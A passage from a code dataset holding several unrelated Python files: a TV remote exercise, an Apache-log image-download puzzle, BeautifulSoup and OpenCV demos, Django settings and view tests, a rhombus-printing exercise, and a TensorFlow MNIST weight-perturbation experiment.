{}\\n\".format(self.tv_status,self.tv_volume,self.channel_list,self.channel)\n \n\n\nremote = RemoteControl()\n \nprint(\"\"\"\n \nTV Application\n\n1- Open TV\n\n2- Close TV\n\n3- Volume Settings\n\n4- Add channel\n\n5- Get number of channel\n\n6- Change channel randomly\n\n7- TV infos\n\nq for exit \n\"\"\")\n\nwhile True:\n process = input(\"Select Process: \")\n \n if(process == \"q\"):\n print(\"Program is closing...\")\n time.sleep(1)\n break\n elif (process == 1):\n remote.turnOn_tv()\n elif(process == 2):\n remote.turnOff_tv()\n elif(process == 3):\n remote.adjustVolume()\n elif(process == 4):\n channel_names= input(\"Input channel names with ',' seperator\")\n \n channel_list = channel_names.split(\",\")\n \n for addingChannels in channel_list:\n remote.addChannel(addingChannels)\n elif(process == 5):\n print(\"Number of channel:\",len(remote))\n \n elif(process == 6):\n remote.randomChannel()\n \n elif(process == 7):\n print(remote)\n \n else:\n print(\"Invalid\")","sub_path":"f-han-keceli/Python/OOP/remote-control.py","file_name":"remote-control.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"225110215","text":"#!/usr/bin/env python3\n\"\"\"\nLogpuzzle exercise\n\nCopyright 2010 Google Inc.\nLicensed under the Apache License, Version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nGoogle's Python Class\nhttp://code.google.com/edu/languages/google-python-class/\n\nGiven an apache logfile, find the puzzle urls and download the images.\n\nHere's what a puzzle url looks like:\n10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] \"GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0\" 302 528 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6\"\n\n\"\"\"\n\n\n__author__ = 'Rob Spears (GitHub: Forty9Unbeaten)'\n\nimport os\nimport re\nimport sys\nimport argparse\nimport webbrowser\n\nif sys.version_info[0] < 3:\n print('\\n\\tGotta use Python 3 for this one...\\n')\n sys.exit(1)\nelse:\n import urllib.request\n\n\ndef read_urls(filename):\n \"\"\"Returns a list of the puzzle urls from the given log file,\n extracting the hostname from the filename itself.\n Screens out duplicate urls and returns the urls sorted into\n increasing order.\"\"\"\n\n # Regular expression matches any string of non-whitespace\n # characters that ends in \".jpg\"\n img_file_regex = r'\\S*\\.jpg'\n\n # Regular expression to determine if custom sorting is needed\n custom_img_regex = r'-\\w*-\\w*\\.jpg'\n\n server_name = 'http://{}'.format(filename.split('_')[1])\n\n with open(filename, 'r') as f:\n log_content = f.read()\n\n # find all image urls in log file, eliminate duplicates and\n # sort in order, accounting for custom sorting need defined\n # in part C of assignment\n img_urls = re.findall(img_file_regex, log_content)\n need_custom_sort = re.search(custom_img_regex, log_content)\n\n if need_custom_sort:\n def custom_sort(url):\n url = url.split('-')\n return url[-1]\n img_urls = filter(lambda x: re.search(custom_img_regex, x), img_urls)\n img_urls = sorted(set(img_urls), key=custom_sort)\n else:\n img_urls = sorted(set(img_urls))\n\n # concat server name with image url to create full URL\n img_urls = [server_name + img_url for img_url in img_urls]\n\n return img_urls\n\n\ndef download_images(img_urls, dest_dir):\n \"\"\"Given the urls already in the correct order, downloads\n each image into the given directory.\n Gives the images local filenames img0, img1, and so on.\n Creates an index.html in the directory\n with an img tag to show each local image file.\n Creates the directory if necessary.\n \"\"\"\n path = os.path.abspath(dest_dir)\n\n # Create specified folder to store downloaded images\n try:\n os.makedirs(path)\n print('\\n\\t{} folder created at {}\\n'.format(dest_dir, path))\n except FileExistsError:\n pass\n except Exception as e:\n print(e)\n\n # download image files at each URL, store them in created\n # directory and append them to a list that serves as the\n # html tags\n img_tags = []\n print('\\tLoading...\\n')\n for i, url in enumerate(img_urls):\n try:\n response = urllib.request.urlretrieve(\n url, filename='{}/img{}.jpg'.format(path, i))\n filename = response[0]\n img_tags.append(''.format(filename))\n except FileExistsError:\n pass\n except Exception as e:\n print('\\n\\tError: {}'.format(e))\n print('\\tDone!\\n')\n\n # create index.html file and write html\n full_html = ['', '', ''.join(img_tags), '', '']\n index_file_path = '{}/index.html'.format(path)\n with open(index_file_path, 'w') as f:\n for tag in full_html:\n f.write('{}\\n'.format(tag))\n\n # prompt for viewing of html file\n user_resp = input(\n '\\tAll images have been downloaded successfully.' +\n 'Would you like to see the picture?\\n\\tY/N:')\n\n # open index.html in new browser tab\n if user_resp.strip().lower() == 'y':\n webpage = 'file://{}'.format(index_file_path)\n webbrowser.open(webpage, new=2)\n else:\n print('\\n\\tindex.html file location:\\t{}'.format(index_file_path))\n\n\ndef create_parser():\n \"\"\"Create an argument parser object\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-d', '--todir', help='destination directory for downloaded images')\n parser.add_argument('logfile', help='apache logfile to extract urls from')\n\n return parser\n\n\ndef main(args):\n \"\"\"Parse args, scan for urls, get images from urls\"\"\"\n parser = create_parser()\n\n if not args:\n parser.print_usage()\n sys.exit(1)\n\n parsed_args = parser.parse_args(args)\n\n img_urls = read_urls(parsed_args.logfile)\n\n if parsed_args.todir:\n download_images(img_urls, parsed_args.todir)\n else:\n print('\\n'.join(img_urls))\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"logpuzzle.py","file_name":"logpuzzle.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"208533808","text":"from bs4 import BeautifulSoup\n\nexampleFile = open('example.html')\nexampleSoup = BeautifulSoup(exampleFile.read(), 'lxml')\nelems = exampleSoup.select('#author')\ntype(elems)\n\nprint(len(elems))\ntype(elems[0])\nprint(elems[0].getText())\nprint(str(elems[0]))\nprint(elems[0].attrs)\n","sub_path":"BS4intro/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"45815226","text":"\"\"\"\nDjango settings for anniv project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\ntry:\n from secret_key import *\nexcept ImportError:\n from django.utils.crypto import get_random_string\n SETTINGS_DIR=os.path.abspath(os.path.dirname(__file__))\n chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'\n secret = get_random_string(50, chars)\n with open(os.path.join(SETTINGS_DIR, 'secret_key.py'), 'w') as f:\n f.write('SECRET_KEY = \"' + secret + '\"' )\n from secret_key import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'challenge',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'anniv.urls'\n\nWSGI_APPLICATION = 'anniv.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'America/New_York'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n 'anniv/templates',\n)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(BASE_DIR, 'static'),\n)\n\nSTATIC_URL = '/static/'\n\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = 'django.contrib.auth.views.login'\n","sub_path":"anniv/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"267275669","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('messi.jpg',0)\nedges = cv2.Canny(img, 120, 150)\n\ncv2.imshow('original', img)\ncv2.imshow('canny', edges)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"image processing/canny edge detection/canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"239880949","text":"#Nama / NIM : Faishal Zharfan / 16519278\r\n#Problem : soal 2\r\n#Tanggal : 26-03-2020\r\n\r\n# Program BelahKetupat\r\n# Input: N : integer\r\n# Output: Jika N > 0 dan ganjil, gambar belah ketupat sesuai dengan N\r\n# Jika tidak, tampilkan pesan kesalahan: \r\n# KAMUS\r\n# Variabel\r\n# N : int\r\n\r\ndef GambarBelahKetupat(N):\r\n# I.S. N > 0 dan N ganjil\r\n# F.S. Gambar belah ketupat dengan panjang diagonal mendatar sebesar N\r\n# sesuai spesifikasi soal\r\n# Lengkapilah kamus lokal dan algoritma prosedur di bawah ini\r\n# KAMUS LOKAL\r\n# N : int\r\n\r\n array = [[' ' for j in range(N)] for i in range(N)]\r\n\r\n for i in range(int((N+1)/2)):\r\n \tfor j in range(int((N-(2*i+1))/2),int((N+(2*i+1))/2)):\r\n \t\tarray[i][j] = '*'\r\n\r\n for i in range(int((N+1)/2),N):\r\n \tfor j in range(int((2*i+2)/2)-int((N+1)/2),N-int((N+1)/2)+(N-i)):\r\n \t\tarray[i][j] = '*'\r\n\r\n for i in range(int((N+1)/2)-1):\r\n \tfor j in range(int((N+(2*i+1))/2),N):\r\n \t\tarray[i][j] = ''\r\n\r\n for i in range(int((N+1)/2),N):\r\n \tfor j in range(N-int((N+1)/2)+(N-i),N):\r\n \t\tarray[i][j] = ''\r\n\r\n for i in range(N):\r\n \tfor j in range(N):\r\n \t\tprint(array[i][j], end='')\r\n \tprint()\r\n \r\n\r\ndef IsValid(N):\r\n# menghasilkan true jika N positif dan ganjil, false jika tidak\r\n# Lengkapilah kamus lokal dan algoritma fungsi di bawah ini\r\n# KAMUS LOKAL\r\n# N : int\r\n\r\n if N > 0 and N%2 == 1:\r\n \treturn True\r\n else :\r\n \treturn False\r\n\r\n# ALGORITMA PROGRAM UTAMA\r\nN = int(input())\r\nif (IsValid(N)): # lengkapi dengan pemanggilan fungsi IsValid\r\n GambarBelahKetupat(N) # lengkapi dengan pemanggilan prosedur GambarBelahKetupat\r\nelse: # N tidak positif atau N tidak ganjil\r\n print(\"Masukan tidak valid\")","sub_path":"belahketupat.py","file_name":"belahketupat.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"405248011","text":"from django.urls import reverse\n\nfrom django_webtest import WebTest\n\nfrom accounts.tests.factories import UserFactory\nfrom directory.tests.factories import OrganisationFactory\nfrom pages.tests.factories import PageFactory\nfrom resources.choices import RESOURCE_APPROVED\nfrom resources.models import Resource\n\nfrom .factories import ResourceCategoryFactory, ResourceCategoryFeaturedFactory, ResourceFactory\n\n\nclass ResourceThankTestView(WebTest):\n\n def setUp(self):\n PageFactory.create(url='/resources/thank-you/')\n\n def test_view(self):\n response = self.app.get(reverse('resources:resource-thank-you'))\n self.assertEqual(response.status_code, 200)\n\n\nclass ResourceUpdateTestView(WebTest):\n\n def setUp(self):\n self.organisation = OrganisationFactory.create()\n self.resource_category = ResourceCategoryFactory.create()\n self.resource = ResourceFactory.create(\n status=RESOURCE_APPROVED,\n organisation=self.organisation,\n )\n self.user = UserFactory.create()\n\n def test_view_no_auth(self):\n response = self.app.get(\n reverse('resources:resource-update', kwargs={'slug': self.resource.slug})\n )\n self.assertEqual(response.status_code, 302)\n\n def test_view_with_auth_random(self):\n response = self.app.get(\n reverse('resources:resource-update', kwargs={'slug': self.resource.slug}),\n user=self.user,\n expect_errors=True,\n )\n self.assertEqual(response.status_code, 403)\n\n def test_view_with_auth(self):\n response = self.app.get(\n reverse('resources:resource-update', kwargs={'slug': self.resource.slug}),\n user=self.resource.created_by,\n )\n form = response.form\n self.assertEqual(response.status_code, 200)\n self.assertEqual(form.fields['title'][0].value, self.resource.title)\n\n def test_submit_form(self):\n self.resource.created_by.approved_organisations.add(self.organisation)\n response = self.app.get(\n reverse('resources:resource-update', kwargs={'slug': self.resource.slug}),\n user=self.resource.created_by,\n )\n form = response.form\n form['categories'] = self.resource_category\n form['abstract'] = 'testing'\n response = form.submit()\n self.resource.refresh_from_db()\n\n self.assertEqual(self.resource.abstract, 'testing')\n self.assertEqual(response.status_code, 302)\n\n\nclass ResourceCreateViewViewTest(WebTest):\n\n def setUp(self):\n self.user = UserFactory.create(\n approved_organisations=OrganisationFactory.create_batch(size=10)\n )\n self.resource_category = ResourceCategoryFactory.create()\n self.initial = {\n 'title': 'test',\n 'abstract': 'abstract',\n 'content': 'content',\n }\n\n def test_view_no_auth(self):\n response = self.app.get(reverse('resources:resource-create'))\n self.assertEqual(response.status_code, 302)\n\n def test_view_public(self):\n response = self.app.get(reverse('resources:resource-create'), user=self.user)\n organisation = self.user.approved_organisations.all()[0]\n form = response.form\n for name, field in form.fields.items():\n if self.initial.get(name):\n field[0].value = self.initial[name]\n form['is_public'] = True\n form['categories'] = self.resource_category\n form['organisation'] = str(organisation.id)\n response = form.submit()\n\n resource = Resource.objects.get(title='test')\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual(resource.organisation_id, organisation.id)\n self.assertFalse(resource.privacy.exists())\n\n def test_not_public(self):\n response = self.app.get(reverse('resources:resource-create'), user=self.user)\n organisation = self.user.approved_organisations.all()[0]\n form = response.form\n for name, field in form.fields.items():\n if self.initial.get(name):\n form[name].value = self.initial[name]\n form['is_public'] = False\n form['categories'] = self.resource_category\n form['organisation'] = str(organisation.id)\n response = form.submit()\n\n resource = Resource.objects.get(title='test')\n self.assertEqual(resource.privacy.count(), self.user.approved_organisations.count())\n\n\nclass ResourceDetailViewTest(WebTest):\n\n def test_resource_doesnot_exist(self):\n response = self.app.get(reverse('resources:resource-detail', kwargs={'slug': 'cat'}))\n self.assertEqual(response.location, reverse('home'))\n\n def test_resource_exist_no_access(self):\n organisation = OrganisationFactory.create()\n resource = ResourceFactory.create(\n slug='testing',\n status=RESOURCE_APPROVED,\n organisation=organisation,\n privacy=[organisation],\n )\n response = self.app.get(\n reverse('resources:resource-detail', kwargs={'slug': resource.slug})\n )\n url = '{url}?next={next}'.format(\n url=reverse('accounts:login'),\n next=resource.get_absolute_url(),\n )\n self.assertEqual(response.location, url)\n\n def test_resource_detail(self):\n organisation = OrganisationFactory.create()\n resource = ResourceFactory.create(\n slug='testing',\n status=RESOURCE_APPROVED,\n organisation=organisation,\n privacy=[organisation],\n )\n user = UserFactory.create(\n approved_organisations=[resource.organisation],\n )\n response = self.app.get(\n reverse('resources:resource-detail', kwargs={'slug': resource.slug}), user=user\n )\n self.assertEqual(response.status_code, 200)\n\n\nclass ResourceCategoryDetailView(WebTest):\n\n def setUp(self):\n self.organisation = OrganisationFactory.create()\n self.resource_category = ResourceCategoryFactory.create()\n\n def test_view_response(self):\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n ),\n )\n self.assertEqual(response.status_code, 200)\n\n def test_featured_resources_visible(self):\n resource = ResourceFactory.create(status=RESOURCE_APPROVED)\n ResourceCategoryFeaturedFactory.create(\n category=self.resource_category,\n resource=resource,\n )\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n )\n )\n featured_resources = response.context['featured_resources']\n self.assertTrue(featured_resources.exists())\n\n def test_featured_resources_not_visible(self):\n resource = ResourceFactory.create(\n status=RESOURCE_APPROVED,\n organisation=self.organisation,\n privacy=[self.organisation],\n )\n ResourceCategoryFeaturedFactory.create(\n category=self.resource_category,\n resource=resource,\n )\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n ),\n )\n featured_resources = response.context['featured_resources']\n self.assertFalse(featured_resources.exists())\n\n def test_featured_resources_visible_for_user(self):\n user = UserFactory.create(approved_organisations=[self.organisation])\n resource = ResourceFactory.create(\n status=RESOURCE_APPROVED,\n organisation=self.organisation,\n privacy=[self.organisation],\n )\n ResourceCategoryFeaturedFactory.create(\n category=self.resource_category,\n resource=resource,\n )\n response = self.app.get(\n reverse(\n 'resources:resource-category-detail', kwargs={'slug': self.resource_category.slug}\n ),\n user=user,\n )\n featured_resources = response.context['featured_resources']\n self.assertTrue(featured_resources.exists())\n\n\nclass TestResourceCategoryListView(WebTest):\n\n def test_empty_return_code(self):\n response = self.app.get(reverse('resource-category-list'))\n self.assertEqual(response.status_code, 200)\n","sub_path":"apps/resources/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"228720805","text":"# a, b = get_acc_for_gaussian_perturbed_logistic_model_MNIST_diag(.0, .3, const_multiplier=.1, record_tensorboard=False)\n# a, b = get_acc_for_gaussian_perturbed_logistic_model_MNIST(.0, .3, const_multiplier=.1, record_tensorboard=False)\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.02, .1, const_multiplier=0.005, record_tensorboard=False)\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST_diag(.015, .03, const_multiplier=.005, record_tensorboard=False)\n# a, b = get_acc_for_gaussian_perturbed_logistic_model_MNIST(.015, .005, const_multiplier=.33)\n\n\ndef get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(mu, sigma=.1, const_multiplier=1., n_tot_iters=5000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp'):\n import tensorflow as tf\n from tensorflow.examples.tutorials.mnist import input_data\n from tensorflow.python.ops import gradients_impl\n import numpy as np\n tf.reset_default_graph()\n mnist = input_data.read_data_sets('/tmp/data', one_hot=True)\n\n x = tf.placeholder(tf.float32, shape = (None, 784), name='Inputs')\n y = tf.placeholder(tf.float32, shape = (None, 10), name='Labels')\n gamma = tf.placeholder(tf.float32, shape = (), name='reg_constant')\n nwts = 7840\n # wts = tf.get_variable('Weights',shape= (784,10), initializer = tf.random_normal_initializer(stddev=.001))\n w = tf.get_variable(name='w', shape=[784, 512], initializer=tf.contrib.layers.xavier_initializer())\n w2 = tf.get_variable(name='w2', shape = [512, 10], initializer = tf.contrib.layers.xavier_initializer())\n bias1 = tf.get_variable('bias1',shape= (512), initializer = tf.random_normal_initializer(stddev=.1))\n bias2 = tf.get_variable('bias2',shape= (10), initializer = tf.random_normal_initializer(stddev=.1))\n\n w_pert = tf.placeholder(tf.float32, shape=(784,512))\n w_pert2 = tf.placeholder(tf.float32, shape=(512,10))\n # 0.1000 0.1292 0.1668 0.2154 0.2783 0.3594 0.4642 0.5995 0.7743 1.0000\n\n # w_pert = tf.stop_gradient(w + shift_pctage*w)\n perturbation = tf.stop_gradient(w - w_pert)\n perturbation2 = tf.stop_gradient(w2 - w_pert2)\n\n\n layer_1_out = tf.nn.relu(tf.matmul(x, w) + bias1)\n\n logits = tf.matmul(layer_1_out, w2) + bias2\n y_ = tf.nn.softmax(logits)\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n accuracy = tf.stop_gradient(tf.reduce_mean(tf.cast(correct_prediction, tf.float32)))\n\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels = y, logits = logits))\n\n\n optimizer = tf.train.AdamOptimizer()\n ce_grads = tf.gradients(loss, [w, w2, bias1,bias2])\n ce_grads_w1 = ce_grads[0]\n ce_grads_w2 = ce_grads[1]\n\n\n\n # print(vars)\n tf.summary.histogram('weights1', w)\n tf.summary.histogram('weights2', w2)\n tf.summary.histogram('pertweights1', w_pert)\n tf.summary.histogram('pertweights2', w_pert2)\n\n if regularizer_mode == 'hvp_adam':\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n hvp1 = gradients_impl._hessian_vector_product(loss, [w], [perturbation])\n hvp2 = gradients_impl._hessian_vector_product(loss, [w2], [perturbation2])\n\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = gamma * 2.0 * hvp1 + diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = gamma * 2.0 * hvp2 + diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n train_op_reg = optimizer.apply_gradients(zip([reg_grad1, reg_grad2], [w, w2]))\n\n elif regularizer_mode == 'diag_adam':\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n vars = optimizer.variables()\n v_2 = vars[-1]\n v_1 = vars[-3]\n\n hvp1 = tf.multiply(v_1 ,perturbation)\n hvp2 = tf.multiply(v_2 ,perturbation2)\n\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = gamma * 2.0 * hvp1 + diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = gamma * 2.0 * hvp2 + diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n train_op_reg = optimizer.apply_gradients(zip([reg_grad1, reg_grad2], [w, w2]))\n\n elif regularizer_mode == 'l2_adam':\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n train_op_reg = optimizer.apply_gradients(zip([reg_grad1, reg_grad2], [w, w2]))\n\n elif regularizer_mode == 'hvp':\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n hvp1 = gradients_impl._hessian_vector_product(loss, [w], [perturbation])\n hvp2 = gradients_impl._hessian_vector_product(loss, [w2], [perturbation2])\n\n reg_grad1 = gamma * 2.0 * hvp1 + diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = gamma * 2.0 * hvp2 + diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n tot_grads1 = ce_grads_w1 + reg_grad1\n tot_grads2 = ce_grads_w2 + reg_grad2\n train_op = optimizer.apply_gradients(zip([tot_grads1, tot_grads2, ce_grads[2], ce_grads[3]], [w, w2, bias1, bias2]))\n train_op_reg = tf.no_op()\n\n elif regularizer_mode == 'l2':\n diag_load_amt1 = gamma * .005 * perturbation\n diag_load_amt2 = gamma * .005 * perturbation2\n\n reg_grad1 = diag_load_amt1\n reg_grad1 = tf.reshape(reg_grad1, tf.shape(w))\n reg_grad2 = diag_load_amt2\n reg_grad2 = tf.reshape(reg_grad2, tf.shape(w2))\n tot_grads1 = ce_grads_w1 + reg_grad1\n tot_grads2 = ce_grads_w2 + reg_grad2\n train_op = optimizer.apply_gradients(zip([tot_grads1, tot_grads2, ce_grads[2], ce_grads[3]], [w, w2, bias1, bias2]))\n train_op_reg = tf.no_op()\n else:\n train_op = optimizer.apply_gradients(zip(ce_grads, [w, w2, bias1, bias2]))\n train_op_reg = tf.no_op()\n\n tf.summary.histogram('ce_gradient1', ce_grads_w1)\n tf.summary.histogram('ce_gradient2', ce_grads_w2)\n\n if const_multiplier>0.:\n print('USING REGULARIZATION')\n\n tf.summary.histogram('regularizer_gradient1', reg_grad1)\n tf.summary.histogram('regularizer_gradient2', reg_grad2)\n tf.summary.histogram('diagonal_load1', diag_load_amt1)\n tf.summary.histogram('diagonal_load2', diag_load_amt2)\n\n tf.summary.scalar('loss_gamma', gamma)\n else:\n print('NO REGULARIZATION')\n train_op_reg = tf.no_op()\n\n\n n_iters = n_tot_iters\n batch_size = 1024\n n_fisher_iters= n_fisher_iters\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.8)\n\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n if record_tensorboard:\n summary_writer = tf.summary.FileWriter('./logs/two_layer_zero_mean', sess.graph)\n summary_op = tf.summary.merge_all()\n\n lossval=[]\n accval=[]\n sess.run(tf.global_variables_initializer())\n\n regularizer_const=0.\n w_pert_ = np.zeros([784, 512])\n w_pert2_ = np.zeros([512, 10])\n\n for i in range(0, n_iters):\n x_batch, y_batch = mnist.train.next_batch(batch_size)\n if i<=(n_iters-n_fisher_iters):\n regularizer_const=0.\n else:\n regularizer_const=.1*const_multiplier\n\n _, __, l, acc, w_ = sess.run([train_op, train_op_reg, loss, accuracy, w,], feed_dict={x: x_batch, y: y_batch, gamma:regularizer_const, w_pert:w_pert_, w_pert2:w_pert2_})\n\n if record_tensorboard:\n summ, _, __, l, acc, w_ = sess.run([summary_op, train_op, train_op_reg, loss, accuracy, w], feed_dict={x: x_batch, y: y_batch, gamma:regularizer_const, w_pert:w_pert_, w_pert2:w_pert2_})\n\n if record_tensorboard:\n summary_writer.add_summary(summ, i)\n lossval.append(l)\n accval.append(acc)\n\n if i == n_iters-n_fisher_iters:\n print('SAVING OPTIMAL ML WEIGHTS FROM END OF TRAINING')\n w_, w2_ = sess.run([w, w2])\n\n if i >= n_iters-n_fisher_iters and regularizer_const>0.:\n w_pert_ = w_ + np.random.normal(mu, sigma, size = [784, 512])\n w_pert2_ = w2_ + np.random.normal(mu, sigma, size = [512, 10])\n\n if i == n_iters - 1:\n print('USING PERTURBATIONS ON WEIGHTS AT END OF ALL ITERATIONS')\n w_, w2_ = sess.run([w, w2])\n # w_pert_ = w_\n # w_pert2_ = w2_\n # w_pert_ = w_ + np.random.normal(mu, sigma, size = [784, 512])\n\n # w_pert2_ = w2_ + np.random.normal(mu, sigma, size = [512, 10])\n\n\n if i%200==0:\n print('\\nIteration: '+str(i)+'\\nAccuracy: '+str(acc)+'\\nLoss: '+str(l)+'\\n')\n\n regularizer_const = 0.\n\n # perturbed_test_set = mnist.test.images+np.random.normal(0.,stddev, np.shape(mnist.test.images))\n w_pert_ = w_ + np.random.normal(mu, sigma, size = [784, 512])\n w_pert2_ = w2_ + np.random.normal(mu, sigma, size = [512, 10])\n\n x_testcv = mnist.test.images\n y_testcv = mnist.test.labels\n x_cv = x_testcv[0:5000,:]\n x_test = x_testcv[5000:,:]\n\n y_cv = y_testcv[0:5000,:]\n y_test = y_testcv[5000:,:]\n up_acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels})\n print('UNPERTURBED Test accuracy %g' % up_acc)\n sess.run(tf.assign(w, w_pert), feed_dict={gamma:regularizer_const, w_pert:w_pert_, w_pert2: w_pert2_})\n sess.run(tf.assign(w2, w_pert2_), feed_dict={gamma:regularizer_const, w_pert:w_pert_, w_pert2: w_pert2_})\n\n pert_acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels, gamma:regularizer_const, w_pert:w_pert_, w_pert2:w_pert2_})\n # pert_acc = sess.run(accuracy, feed_dict={x: perturbed_test_set, y: mnist.test.labels})\n print('PRETURBED test accuracy %g' % pert_acc)\n # summary_writer.close()\n sess.close()\n\n return up_acc, pert_acc\n\n\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.02, .1, const_multiplier=0.00, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.05, .1, const_multiplier=0.05, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.005, .05, const_multiplier=0.00, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\n# a, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.01, .005, const_multiplier=.05, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='none')\na, b = get_acc_for_nonzero_gaussian_perturbed_two_layer_model_MNIST(.1, .005, const_multiplier=.05, n_tot_iters=7000, n_fisher_iters=2000, record_tensorboard=False, regularizer_mode='hvp_adam')\n# a, b = 